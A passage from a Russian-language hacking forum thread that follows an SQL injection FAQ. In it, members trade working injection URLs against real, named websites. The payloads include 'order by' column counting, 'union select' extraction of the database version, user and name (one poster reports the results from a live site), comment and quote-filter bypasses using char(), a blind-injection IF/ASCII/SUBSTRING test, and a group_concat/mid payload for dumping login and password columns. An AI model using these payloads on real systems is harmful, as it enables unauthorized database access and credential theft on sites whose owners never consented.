Авторские статьи SQL injection полный FAQ

Discussion in 'Статьи' started by Dr.Z3r0, 7 Jul 2007.

  1. 2640750

    2640750 New Member

    Joined:
    14 May 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0

    Это конечно все правильно спорить не стану но вот для новичков никаких статей или FAQ по которых можно было осваивать на практике инъекции на современных ресурсах я найти не смог. Остается только разве что устанавливать "Denwer" и на localhost-те который ничего не фильтрует практиковать инъекции.

    Ладно пойду погуглю часок другой может что-небудь и найду достаточно разжеванное для моего уровня познаний :rolleyes:
    P.S.: надеюсь я еще не надоел со своими философствованиями
     
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    https://forum.antichat.ru/threadedpost1814768.html#post1814768

    Как бэ здесь около 11к постов с SQL Injection, бери любой да копай. :)
    Мы сейчас общаемся в теме с отличным FAQ'ом по скулям.
     
  3. 2640750

    2640750 New Member

    Joined:
    14 May 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    ничего себе. еще никогда не видел чтоб на одну тему приходилось столько страниц. тут же месяцами читать не перечитать
     
  4. 2640750

    2640750 New Member

    Joined:
    14 May 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Спасибо за ссылку на список форумов. Но я все же решил воспользоваться твоей добротой и задать несколько (скорее всего глупых) вопросов. Но сначала мои достижения:
    На https://forum.antichat.ru/threadnav21336-1141-10.html в посте #11404 пишется об http://www.glassdecor.ru
    http://www.glassdecor.ru/articles/show.php?id=11+order+by+2-- узнал что поля 2
    http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2-- узнал что выводится второе из них.
    http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws(0x3a,version(),user(),database())-- узнал об версти- 5.0.67, имени пользователи [email protected] и имени БД - glassdecorru_db.
    На сколько я понимаю функция concat_ws() используется для того чтобы объединить в виде одного параметра (не знаю как это точнее назвать) сразу три функции: version() , user(), database().
    А теперь глупые вопросы:
    1) http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2+from+INFORMATION_SCHEMA.TABLES-- оказался алогичным к
    http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2-- INFORMATION_SCHEMA.TABLES появилась в 5-ой версии а у нас 5.0.67. значит она должна быть. Где я ступил?
    2) http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2/* почему-то приводит к ошибке. Значит ли это что «/» фильтруется? На сколько я понимаю нет. Потому что http://www.glassdecor.ru/articles/show.php?id=-11/**/union/**/+select/**/+1,2-- срабатывает как надо. А вот почему срабатывает комментарий «--», а при «/*» - ошибка я так и не понял?
    3) Первый параметр concat_ws() – «0x3a» это имеется ввиду символ двоеточия «:» Но почему эго надо прописывать кодом а если просто прописать http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws:),version(),user(),database())-- то приводит к ошибке. Значит ли это что символ двоеточия «:» фильтруется.
    4) Что можно делать дальше если использование INFORMATION_SCHEMA.TABLES ни к чему полезному не приводит ?

    P.S.: Что-то мои посты с каждым разом все длиннее и длиннее. Ctacok надеюсь я тебя ими еще не задолбал. Очень уж хочется освоить эту тему.
     
    #124 2640750, 9 Jan 2010
    Last edited: 9 Jan 2010
  5. dimonle

    dimonle New Member

    Joined:
    24 Jan 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Сорри за нубский вопрос.когда я проверяю на уязвимости методом подставления кавычек и всего остального,выкидывает на главную.это как понимать?
     
  6. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Не факт, может и блайнд, который при ошибке запроса кидает на главную
     
  7. dimonle

    dimonle New Member

    Joined:
    24 Jan 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    спасибо,а если на подставление кавычки и также всего остального вообще ничего не выскакивает кавычка не фильруеццо типа %20 а просто страничка остается такая же то это блайнд?
     
  8. dimonle

    dimonle New Member

    Joined:
    24 Jan 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А есть какой то фак по блайнду?
     
  9. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    https://forum.antichat.net/showpost.php?p=407227&postcount=3

    :(
     
    1 person likes this.
  10. LMaster

    LMaster Member

    Joined:
    15 Jun 2008
    Messages:
    14
    Likes Received:
    8
    Reputations:
    0
    Зачарь без кавычек. (http://jdstiles.com/java/cct.html)
    Например: ... WHERE table_name=char(84, 65, 66, 76, 69)/*
     
    1 person likes this.
  11. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Вот несколько вопросов:
    1. Вот есть сайт типа "бла-бла.ру/ид1", если я поставлю "ид1’ ", и выдаст ошибку, типа
    , то что нужно делать дальше? подбирать количество строк? типа:
    ?, или количество полей? типа:
    ?
    2. И еще, если есть готовая уязвимость например:
    , что сделать дальше, чтобы попасть в бд?
     
  12. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,184
    Likes Received:
    618
    Reputations:
    690
    2CyberHunter внимательно читай с первой страницы =\
     
    _________________________
  13. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Перечитал раза три...
    Я просто не знаю языка sql =(.
    Но прочитал статью и понял, что можно и без этого)).
    Так может ответите? Не доходит и все =..(
     
  14. Monsieur

    Monsieur New Member

    Joined:
    17 Jan 2010
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Оператором order by ты находишь количество полей.
    Union select 1,2...-ты определяешь принтабельное поле(т.е. то,через которое ты будешь выводить информацию)
     
  15. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Чатсный случай1
    Хоть и баян, но
    Code:
    _http://www.laptopshowcase.co.uk/downloads.php?id=-1/*
    Ошибка такого вида:
    Code:
    _http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+1+union+select+1,2,version(),4,5,6,7,8,9,0,11/*
    
    Терерь представляем себе что нет вывода ошибок!
     
    #135 Strilo4ka, 21 Mar 2010
    Last edited: 21 Mar 2010
  16. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Я правильно понимаю, что в данном случае ничего кроме глобальных переменных вроде USER достать нельзя? Т.е. вытащить что-то из базы не возможно?



    P.S.
    В статье опячатка:
    (id*IF(ASCII(SUBSTRING(USER(),0,1))=113,1,-1))
    должно быть
    (id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
     
    #136 [R]eD, 17 May 2010
    Last edited: 17 May 2010
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Можно всё, на что есть права.
     
    1 person likes this.
  18. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Можно пример запроса с SELECT'ом? :)
     
  19. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    пример с селектом тут - Тыц

    З.Ы. Хватит засирать статьи!
     
    5 people like this.
  20. CTAPu4OK

    CTAPu4OK Banned

    Joined:
    28 Oct 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Такое маленькое дополнение) group_concat имеет ограничение выводимости данных в 1024 + limit он не поддерживает, что бы обойти его нужно использовать mid

    К примеру вот так:
    587955+union+select+1,2,3,4,5,mid(group_concat(login,char(38),password),600,1024),7,8,9,10,11+from+База.Таблица--
     
    #140 CTAPu4OK, 22 May 2010
    Last edited: 22 May 2010